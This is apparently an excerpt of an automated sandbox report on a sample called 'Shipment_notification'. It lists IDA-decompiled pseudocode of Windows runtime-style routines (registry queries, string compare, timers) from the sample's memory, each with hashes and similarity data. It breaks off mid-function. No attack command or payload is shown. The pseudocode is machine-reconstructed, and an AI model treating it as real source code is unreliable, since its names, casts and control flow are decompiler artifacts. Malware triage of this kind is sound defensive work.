                                                                                				_t124 = L01B04620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                                                				if(_t124 != 0) {
                                                                                					 *_t124 =  *_t124 & 0x00000000;
                                                                                					_t124[1] = _t124[1] & 0x00000000;
                                                                                					_t124[4] = _t124[4] & 0x00000000;
                                                                                					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                                                						L13:
                                                                                						_push(_t124);
                                                                                						if((_t106 & 0x00000002) != 0) {
                                                                                							_push(0x200);
                                                                                							_push(0x28);
                                                                                							_push(0xffffffff);
                                                                                							_t122 = E01B29800();
                                                                                							if(_t122 < 0) {
                                                                                								L33:
                                                                                								if((_t124[4] & 0x00000001) != 0) {
                                                                                									_push(4);
                                                                                									_t64 =  &(_t124[1]); // 0x4
                                                                                									_t107 = _t64;
                                                                                									_push(_t107);
                                                                                									_push(5);
                                                                                									_push(0xfffffffe);
                                                                                									E01B295B0();
                                                                                									if( *_t107 != 0) {
                                                                                										_push( *_t107);
                                                                                										E01B295D0();
                                                                                									}
                                                                                								}
                                                                                								_push(_t124);
                                                                                								_push(0);
                                                                                								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                								L37:
                                                                                								L01B077F0();
                                                                                								return _t122;
                                                                                							}
                                                                                							_t124[4] = _t124[4] | 0x00000002;
                                                                                							L18:
                                                                                							_t108 = _a8;
                                                                                							_t29 =  &(_t124[0x105]); // 0x414
                                                                                							_t80 = _t29;
                                                                                							_t30 =  &(_t124[5]); // 0x14
                                                                                							_t124[3] = _t80;
                                                                                							_t123 = 0;
                                                                                							_t124[2] = _t30;
                                                                                							 *_t80 = _t108;
                                                                                							if(_t108 == 0) {
                                                                                								L21:
                                                                                								_t112 = 0x400;
                                                                                								_push( &_v8);
                                                                                								_v8 = 0x400;
                                                                                								_push(_t124[2]);
                                                                                								_push(0x400);
                                                                                								_push(_t124[3]);
                                                                                								_push(0);
                                                                                								_push( *_t124);
                                                                                								_t122 = E01B29910();
                                                                                								if(_t122 != 0xc0000023) {
                                                                                									L26:
                                                                                									if(_t122 != 0x106) {
                                                                                										L40:
                                                                                										if(_t122 < 0) {
                                                                                											L29:
                                                                                											_t83 = _t124[2];
                                                                                											if(_t83 != 0) {
                                                                                												_t59 =  &(_t124[5]); // 0x14
                                                                                												if(_t83 != _t59) {
                                                                                													L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                                                												}
                                                                                											}
                                                                                											_push( *_t124);
                                                                                											E01B295D0();
                                                                                											goto L33;
                                                                                										}
                                                                                										 *_a16 = _t124;
                                                                                										return 0;
                                                                                									}
                                                                                									if(_t108 != 1) {
                                                                                										_t122 = 0;
                                                                                										goto L40;
                                                                                									}
                                                                                									_t122 = 0xc0000061;
                                                                                									goto L29;
                                                                                								} else {
                                                                                									goto L22;
                                                                                								}
                                                                                								while(1) {
                                                                                									L22:
                                                                                									_t89 =  *0x1bd7b9c; // 0x0
                                                                                									_t92 = L01B04620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                                                									_t124[2] = _t92;
                                                                                									if(_t92 == 0) {
                                                                                										break;
                                                                                									}
                                                                                									_t112 =  &_v8;
                                                                                									_push( &_v8);
                                                                                									_push(_t92);
                                                                                									_push(_v8);
                                                                                									_push(_t124[3]);
                                                                                									_push(0);
                                                                                									_push( *_t124);
                                                                                									_t122 = E01B29910();
                                                                                									if(_t122 != 0xc0000023) {
                                                                                										goto L26;
                                                                                									}
                                                                                									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                                                								}
                                                                                								_t122 = 0xc0000017;
                                                                                								goto L26;
                                                                                							}
                                                                                							_t119 = 0;
                                                                                							do {
                                                                                								_t114 = _t124[3];
                                                                                								_t119 = _t119 + 0xc;
                                                                                								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                                                								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                                                								_t123 = _t123 + 1;
                                                                                								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                                                							} while (_t123 < _t108);
                                                                                							goto L21;
                                                                                						}
                                                                                						_push(0x28);
                                                                                						_push(3);
                                                                                						_t122 = E01AEA7B0();
                                                                                						if(_t122 < 0) {
                                                                                							goto L33;
                                                                                						}
                                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                                						goto L18;
                                                                                					}
                                                                                					if((_t106 & 0x00000001) == 0) {
                                                                                						_t115 = 0x28;
                                                                                						_t122 = E01B7E7D3(_t115, _t124);
                                                                                						if(_t122 < 0) {
                                                                                							L9:
                                                                                							_push(_t124);
                                                                                							_push(0);
                                                                                							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                							goto L37;
                                                                                						}
                                                                                						L12:
                                                                                						if( *_t124 != 0) {
                                                                                							goto L18;
                                                                                						}
                                                                                						goto L13;
                                                                                					}
                                                                                					_t15 =  &(_t124[1]); // 0x4
                                                                                					_t117 = 4;
                                                                                					_t122 = E01B7E7D3(_t117, _t15);
                                                                                					if(_t122 >= 0) {
                                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                                						_v12 = _v12 & 0x00000000;
                                                                                						_push(4);
                                                                                						_push( &_v12);
                                                                                						_push(5);
                                                                                						_push(0xfffffffe);
                                                                                						E01B295B0();
                                                                                						goto L12;
                                                                                					}
                                                                                					goto L9;
                                                                                				} else {
                                                                                					return 0xc0000017;
                                                                                				}
                                                                                			}





















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 11f8c8cc084ffeb14c7c0219c2d21606199eaad3bcc6b45f0386751adcb3b79e
                                                                                • Instruction ID: 734f50e60bc2f3c3ec3fd377fec73ff0d001ff9e048ba0a48f24f5f986bfe23d
                                                                                • Opcode Fuzzy Hash: 11f8c8cc084ffeb14c7c0219c2d21606199eaad3bcc6b45f0386751adcb3b79e
                                                                                • Instruction Fuzzy Hash: FF71F532200702AFDB3AEF18CA44F66BBA5EF40724F1445A8E669972E0DB71E944CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E01AE52A5(char __ecx) {
                                                                                				char _v20;
                                                                                				char _v28;
                                                                                				char _v29;
                                                                                				void* _v32;
                                                                                				void* _v36;
                                                                                				void* _v37;
                                                                                				void* _v38;
                                                                                				void* _v40;
                                                                                				void* _v46;
                                                                                				void* _v64;
                                                                                				void* __ebx;
                                                                                				intOrPtr* _t49;
                                                                                				signed int _t53;
                                                                                				short _t85;
                                                                                				signed int _t87;
                                                                                				signed int _t88;
                                                                                				signed int _t89;
                                                                                				intOrPtr _t101;
                                                                                				intOrPtr* _t102;
                                                                                				intOrPtr* _t104;
                                                                                				signed int _t106;
                                                                                				void* _t108;
                                                                                
                                                                                				_t93 = __ecx;
                                                                                				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                                				_push(_t88);
                                                                                				_v29 = __ecx;
                                                                                				_t89 = _t88 | 0xffffffff;
                                                                                				while(1) {
                                                                                					E01AFEEF0(0x1bd79a0);
                                                                                					_t104 =  *0x1bd8210; // 0x1582c90
                                                                                					if(_t104 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					asm("lock inc dword [esi]");
                                                                                					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                                					E01AFEB70(_t93, 0x1bd79a0);
                                                                                					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                                						_t101 =  *0x7ffe02dc;
                                                                                						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                                							L9:
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0x90028);
                                                                                							_push(_t108 + 0x20);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push( *((intOrPtr*)(_t104 + 4)));
                                                                                							_t53 = E01B29890();
                                                                                							__eflags = _t53;
                                                                                							if(_t53 >= 0) {
                                                                                								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                                									E01AFEEF0(0x1bd79a0);
                                                                                									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                                									E01AFEB70(0, 0x1bd79a0);
                                                                                								}
                                                                                								goto L3;
                                                                                							}
                                                                                							__eflags = _t53 - 0xc0000012;
                                                                                							if(__eflags == 0) {
                                                                                								L12:
                                                                                								_t13 = _t104 + 0xc; // 0x1582c9d
                                                                                								_t93 = _t13;
                                                                                								 *((char*)(_t108 + 0x12)) = 0;
                                                                                								__eflags = E01B1F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                								if(__eflags >= 0) {
                                                                                									L15:
                                                                                									_t102 = _v28;
                                                                                									 *_t102 = 2;
                                                                                									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                									E01AFEEF0(0x1bd79a0);
                                                                                									__eflags =  *0x1bd8210 - _t104; // 0x1582c90
                                                                                									if(__eflags == 0) {
                                                                                										__eflags =  *((char*)(_t108 + 0xe));
                                                                                										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                                										 *0x1bd8210 = _t102;
                                                                                										_t32 = _t102 + 0xc; // 0x0
                                                                                										 *_t95 =  *_t32;
                                                                                										_t33 = _t102 + 0x10; // 0x0
                                                                                										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                                										_t35 = _t102 + 4; // 0xffffffff
                                                                                										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                                										if(__eflags != 0) {
                                                                                											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                                											E01B64888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                                										}
                                                                                										E01AFEB70(_t95, 0x1bd79a0);
                                                                                										asm("lock xadd [esi], eax");
                                                                                										if(__eflags == 0) {
                                                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                											E01B295D0();
                                                                                											L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                										}
                                                                                										asm("lock xadd [esi], ebx");
                                                                                										__eflags = _t89 == 1;
                                                                                										if(_t89 == 1) {
                                                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                											E01B295D0();
                                                                                											L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                										}
                                                                                										_t49 = _t102;
                                                                                										L4:
                                                                                										return _t49;
                                                                                									}
                                                                                									E01AFEB70(_t93, 0x1bd79a0);
                                                                                									asm("lock xadd [esi], eax");
                                                                                									if(__eflags == 0) {
                                                                                										_push( *((intOrPtr*)(_t104 + 4)));
                                                                                										E01B295D0();
                                                                                										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                									}
                                                                                									 *_t102 = 1;
                                                                                									asm("lock xadd [edi], eax");
                                                                                									if(__eflags == 0) {
                                                                                										_t28 = _t102 + 4; // 0xffffffff
                                                                                										_push( *_t28);
                                                                                										E01B295D0();
                                                                                										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                                									}
                                                                                									continue;
                                                                                								}
                                                                                								_t93 =  &_v20;
                                                                                								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                                								_t85 = 6;
                                                                                								_v20 = _t85;
                                                                                								_t87 = E01B1F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                								__eflags = _t87;
                                                                                								if(_t87 < 0) {
                                                                                									goto L3;
                                                                                								}
                                                                                								 *((char*)(_t108 + 0xe)) = 1;
                                                                                								goto L15;
                                                                                							}
                                                                                							__eflags = _t53 - 0xc000026e;
                                                                                							if(__eflags != 0) {
                                                                                								goto L3;
                                                                                							}
                                                                                							goto L12;
                                                                                						}
                                                                                						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                                						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                                							goto L3;
                                                                                						} else {
                                                                                							goto L9;
                                                                                						}
                                                                                					}
                                                                                					L3:
                                                                                					_t49 = _t104;
                                                                                					goto L4;
                                                                                				}
                                                                                				_t49 = 0;
                                                                                				goto L4;
                                                                                			}


























                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 31f6eb88a42472d72276bfc2fa7faca6f6376ba20287f48c4a3678a720809ed7
                                                                                • Instruction ID: cef7c3a064fa0199fb44bbacc604f49d629ed8f180903f9bbe847985da026e79
                                                                                • Opcode Fuzzy Hash: 31f6eb88a42472d72276bfc2fa7faca6f6376ba20287f48c4a3678a720809ed7
                                                                                • Instruction Fuzzy Hash: A2515231205342AFD72AEF68C844B67BBE4FF50704F04495EF58983661EB70E804CBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B12AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                                                				signed short* _v8;
                                                                                				signed short* _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr* _v28;
                                                                                				signed int _v32;
                                                                                				signed int _v36;
                                                                                				short _t56;
                                                                                				signed int _t57;
                                                                                				intOrPtr _t58;
                                                                                				signed short* _t61;
                                                                                				intOrPtr _t72;
                                                                                				intOrPtr _t75;
                                                                                				intOrPtr _t84;
                                                                                				intOrPtr _t87;
                                                                                				intOrPtr* _t90;
                                                                                				signed short* _t91;
                                                                                				signed int _t95;
                                                                                				signed short* _t96;
                                                                                				intOrPtr _t97;
                                                                                				intOrPtr _t102;
                                                                                				signed int _t108;
                                                                                				intOrPtr _t110;
                                                                                				signed int _t111;
                                                                                				signed short* _t112;
                                                                                				void* _t113;
                                                                                				signed int _t116;
                                                                                				signed short** _t119;
                                                                                				short* _t120;
                                                                                				signed int _t123;
                                                                                				signed int _t124;
                                                                                				void* _t125;
                                                                                				intOrPtr _t127;
                                                                                				signed int _t128;
                                                                                
                                                                                				_t90 = __ecx;
                                                                                				_v16 = __edx;
                                                                                				_t108 = _a4;
                                                                                				_v28 = __ecx;
                                                                                				_t4 = _t108 - 1; // -1
                                                                                				if(_t4 > 0x13) {
                                                                                					L15:
                                                                                					_t56 = 0xc0000100;
                                                                                					L16:
                                                                                					return _t56;
                                                                                				}
                                                                                				_t57 = _t108 * 0x1c;
                                                                                				_v32 = _t57;
                                                                                				_t6 = _t57 + 0x1bd8204; // 0x0
                                                                                				_t123 =  *_t6;
                                                                                				_t7 = _t57 + 0x1bd8208; // 0x1bd8207
                                                                                				_t8 = _t57 + 0x1bd8208; // 0x1bd8207
                                                                                				_t119 = _t8;
                                                                                				_v36 = _t123;
                                                                                				_t110 = _t7 + _t123 * 8;
                                                                                				_v24 = _t110;
                                                                                				_t111 = _a4;
                                                                                				if(_t119 >= _t110) {
                                                                                					L12:
                                                                                					if(_t123 != 3) {
                                                                                						_t58 =  *0x1bd8450; // 0x0
                                                                                						if(_t58 == 0) {
                                                                                							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                                                						}
                                                                                					} else {
                                                                                						_t26 = _t57 + 0x1bd821c; // 0x0
                                                                                						_t58 =  *_t26;
                                                                                					}
                                                                                					 *_t90 = _t58;
                                                                                					goto L15;
                                                                                				} else {
                                                                                					goto L2;
                                                                                				}
                                                                                				while(1) {
                                                                                					_t116 =  *_t61 & 0x0000ffff;
                                                                                					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                					if(_t116 == _t128) {
                                                                                						goto L18;
                                                                                					}
                                                                                					L5:
                                                                                					if(_t116 >= 0x61) {
                                                                                						if(_t116 > 0x7a) {
                                                                                							_t97 =  *0x1bd6d5c; // 0x7fd40654
                                                                                							_t72 =  *0x1bd6d5c; // 0x7fd40654
                                                                                							_t75 =  *0x1bd6d5c; // 0x7fd40654
                                                                                							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                                                						} else {
                                                                                							_t116 = _t116 - 0x20;
                                                                                						}
                                                                                					}
                                                                                					if(_t128 >= 0x61) {
                                                                                						if(_t128 > 0x7a) {
                                                                                							_t102 =  *0x1bd6d5c; // 0x7fd40654
                                                                                							_t84 =  *0x1bd6d5c; // 0x7fd40654
                                                                                							_t87 =  *0x1bd6d5c; // 0x7fd40654
                                                                                							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                                                						} else {
                                                                                							_t128 = _t128 - 0x20;
                                                                                						}
                                                                                					}
                                                                                					if(_t116 == _t128) {
                                                                                						_t61 = _v12;
                                                                                						_t96 = _v8;
                                                                                					} else {
                                                                                						_t113 = _t116 - _t128;
                                                                                						L9:
                                                                                						_t111 = _a4;
                                                                                						if(_t113 == 0) {
                                                                                							_t115 =  &(( *_t119)[_t111 + 1]);
                                                                                							_t33 =  &(_t119[1]); // 0x100
                                                                                							_t120 = _a8;
                                                                                							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                                                							_t35 = _t95 - 1; // 0xff
                                                                                							_t124 = _t35;
                                                                                							if(_t120 == 0) {
                                                                                								L27:
                                                                                								 *_a16 = _t95;
                                                                                								_t56 = 0xc0000023;
                                                                                								goto L16;
                                                                                							}
                                                                                							if(_t124 >= _a12) {
                                                                                								if(_a12 >= 1) {
                                                                                									 *_t120 = 0;
                                                                                								}
                                                                                								goto L27;
                                                                                							}
                                                                                							 *_a16 = _t124;
                                                                                							_t125 = _t124 + _t124;
                                                                                							E01B2F3E0(_t120, _t115, _t125);
                                                                                							_t56 = 0;
                                                                                							 *((short*)(_t125 + _t120)) = 0;
                                                                                							goto L16;
                                                                                						}
                                                                                						_t119 =  &(_t119[2]);
                                                                                						if(_t119 < _v24) {
                                                                                							L2:
                                                                                							_t91 =  *_t119;
                                                                                							_t61 = _t91;
                                                                                							_v12 = _t61;
                                                                                							_t112 =  &(_t61[_t111]);
                                                                                							_v8 = _t112;
                                                                                							if(_t61 >= _t112) {
                                                                                								break;
                                                                                							} else {
                                                                                								_t127 = _v16 - _t91;
                                                                                								_t96 = _t112;
                                                                                								_v20 = _t127;
                                                                                								_t116 =  *_t61 & 0x0000ffff;
                                                                                								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                								if(_t116 == _t128) {
                                                                                									goto L18;
                                                                                								}
                                                                                								goto L5;
                                                                                							}
                                                                                						} else {
                                                                                							_t90 = _v28;
                                                                                							_t57 = _v32;
                                                                                							_t123 = _v36;
                                                                                							goto L12;
                                                                                						}
                                                                                					}
                                                                                					L18:
                                                                                					_t61 =  &(_t61[1]);
                                                                                					_v12 = _t61;
                                                                                					if(_t61 >= _t96) {
                                                                                						break;
                                                                                					}
                                                                                					_t127 = _v20;
                                                                                				}
                                                                                				_t113 = 0;
                                                                                				goto L9;
                                                                                			}


                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • Opcode ID: fa6d9034862c4c60305f7e58cd1b391dca321f965c6a5e720328c49e19b0b43e
                                                                                • Instruction ID: 47fbd4124e64aa25bb93af9159d78f752283b6718bc58f1a111c04003cf99d8d
                                                                                • Opcode Fuzzy Hash: fa6d9034862c4c60305f7e58cd1b391dca321f965c6a5e720328c49e19b0b43e
                                                                                • Instruction Fuzzy Hash: 7151B376A00115CFCB1CCF5CC4909BEB7B1FB8870176685DAE846DB369E734AA51CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E01B0DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				char _v5;
                                                                                				signed int _v12;
                                                                                				signed int* _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v40;
                                                                                				intOrPtr _v44;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				signed int _t54;
                                                                                				char* _t58;
                                                                                				signed int _t66;
                                                                                				intOrPtr _t67;
                                                                                				intOrPtr _t68;
                                                                                				intOrPtr _t72;
                                                                                				intOrPtr _t73;
                                                                                				signed int* _t75;
                                                                                				intOrPtr _t79;
                                                                                				intOrPtr _t80;
                                                                                				char _t82;
                                                                                				signed int _t83;
                                                                                				signed int _t84;
                                                                                				signed int _t88;
                                                                                				signed int _t89;
                                                                                				intOrPtr _t90;
                                                                                				intOrPtr _t92;
                                                                                				signed int _t97;
                                                                                				intOrPtr _t98;
                                                                                				intOrPtr* _t99;
                                                                                				signed int* _t101;
                                                                                				signed int* _t102;
                                                                                				intOrPtr* _t103;
                                                                                				intOrPtr _t105;
                                                                                				signed int _t106;
                                                                                				void* _t118;
                                                                                
                                                                                				_t92 = __edx;
                                                                                				_t75 = _a4;
                                                                                				_t98 = __ecx;
                                                                                				_v44 = __edx;
                                                                                				_t106 = _t75[1];
                                                                                				_v40 = __ecx;
                                                                                				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                                                					_t82 = 0;
                                                                                				} else {
                                                                                					_t82 = 1;
                                                                                				}
                                                                                				_v5 = _t82;
                                                                                				_t6 = _t98 + 0xc8; // 0xc9
                                                                                				_t101 = _t6;
                                                                                				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                                                				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                                                				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                                                				if(_t82 != 0) {
                                                                                					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                                                					_t83 =  *_t75;
                                                                                					_t54 = _t75[1];
                                                                                					 *_t101 = _t83;
                                                                                					_t84 = _t83 | _t54;
                                                                                					_t101[1] = _t54;
                                                                                					if(_t84 == 0) {
                                                                                						_t101[1] = _t101[1] & _t84;
                                                                                						 *_t101 = 1;
                                                                                					}
                                                                                					goto L19;
                                                                                				} else {
                                                                                					if(_t101 == 0) {
                                                                                						E01AECC50(E01AE4510(0xc000000d));
                                                                                						_t88 =  *_t101;
                                                                                						_t97 = _t101[1];
                                                                                						L15:
                                                                                						_v12 = _t88;
                                                                                						_t66 = _t88 -  *_t75;
                                                                                						_t89 = _t97;
                                                                                						asm("sbb ecx, [ebx+0x4]");
                                                                                						_t118 = _t89 - _t97;
                                                                                						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                                                							_t66 = _t66 | 0xffffffff;
                                                                                							_t89 = 0x7fffffff;
                                                                                						}
                                                                                						 *_t101 = _t66;
                                                                                						_t101[1] = _t89;
                                                                                						L19:
                                                                                						if(E01B07D50() != 0) {
                                                                                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                						} else {
                                                                                							_t58 = 0x7ffe0386;
                                                                                						}
                                                                                						_t102 = _v16;
                                                                                						if( *_t58 != 0) {
                                                                                							_t58 = L01BB8ED6(_t102, _t98);
                                                                                						}
                                                                                						_t76 = _v44;
                                                                                						E01B02280(_t58, _v44);
                                                                                						E01B0DD82(_v44, _t102, _t98);
                                                                                						E01B0B944(_t102, _v5);
                                                                                						return E01AFFFB0(_t76, _t98, _t76);
                                                                                					}
                                                                                					_t99 = 0x7ffe03b0;
                                                                                					do {
                                                                                						_t103 = 0x7ffe0010;
                                                                                						do {
                                                                                							_t67 =  *0x1bd8628; // 0x0
                                                                                							_v28 = _t67;
                                                                                							_t68 =  *0x1bd862c; // 0x0
                                                                                							_v32 = _t68;
                                                                                							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                                                							_v20 =  *_t99;
                                                                                							while(1) {
                                                                                								_t97 =  *0x7ffe000c;
                                                                                								_t90 =  *0x7FFE0008;
                                                                                								if(_t97 ==  *_t103) {
                                                                                									goto L10;
                                                                                								}
                                                                                								asm("pause");
                                                                                							}
                                                                                							L10:
                                                                                							_t79 = _v24;
                                                                                							_t99 = 0x7ffe03b0;
                                                                                							_v12 =  *0x7ffe03b0;
                                                                                							_t72 =  *0x7FFE03B4;
                                                                                							_t103 = 0x7ffe0010;
                                                                                							_v36 = _t72;
                                                                                						} while (_v20 != _v12 || _t79 != _t72);
                                                                                						_t73 =  *0x1bd8628; // 0x0
                                                                                						_t105 = _v28;
                                                                                						_t80 =  *0x1bd862c; // 0x0
                                                                                					} while (_t105 != _t73 || _v32 != _t80);
                                                                                					_t98 = _v40;
                                                                                					asm("sbb edx, [ebp-0x20]");
                                                                                					_t88 = _t90 - _v12 - _t105;
                                                                                					_t75 = _a4;
                                                                                					asm("sbb edx, eax");
                                                                                					_t31 = _t98 + 0xc8; // 0x1bafb53
                                                                                					_t101 = _t31;
                                                                                					 *_t101 = _t88;
                                                                                					_t101[1] = _t97;
                                                                                					goto L15;
                                                                                				}
                                                                                			}










































                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 264922d3865a0ec0ab7fb85d63c630efdc67abace818be45c87c182117d719e5
                                                                                • Instruction ID: cb3613d870abbc60a1904c586afb818fcc56f8fce64af47b742f0313a1d859a3
                                                                                • Opcode Fuzzy Hash: 264922d3865a0ec0ab7fb85d63c630efdc67abace818be45c87c182117d719e5
                                                                                • Instruction Fuzzy Hash: 67519275A01605DFCB1ACFE8C49079DBFF1FB48310F24869AD555A7384DB31A944CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E01AFEF40(intOrPtr __ecx) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				char _v7;
                                                                                				char _v8;
                                                                                				signed int _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t58;
                                                                                				char _t59;
                                                                                				signed char _t69;
                                                                                				void* _t73;
                                                                                				signed int _t74;
                                                                                				char _t79;
                                                                                				signed char _t81;
                                                                                				signed int _t85;
                                                                                				signed int _t87;
                                                                                				intOrPtr _t90;
                                                                                				signed char* _t91;
                                                                                				void* _t92;
                                                                                				signed int _t94;
                                                                                				void* _t96;
                                                                                
                                                                                				_t90 = __ecx;
                                                                                				_v16 = __ecx;
                                                                                				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                                                					_t58 =  *((intOrPtr*)(__ecx));
                                                                                					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                                                						E01AE9080(_t73, __ecx, __ecx, _t92);
                                                                                					}
                                                                                				}
                                                                                				_t74 = 0;
                                                                                				_t96 =  *0x7ffe036a - 1;
                                                                                				_v12 = 0;
                                                                                				_v7 = 0;
                                                                                				if(_t96 > 0) {
                                                                                					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                                                					_v12 = _t74;
                                                                                					_v7 = _t96 != 0;
                                                                                				}
                                                                                				_t79 = 0;
                                                                                				_v8 = 0;
                                                                                				_v5 = 0;
                                                                                				while(1) {
                                                                                					L4:
                                                                                					_t59 = 1;
                                                                                					L5:
                                                                                					while(1) {
                                                                                						if(_t59 == 0) {
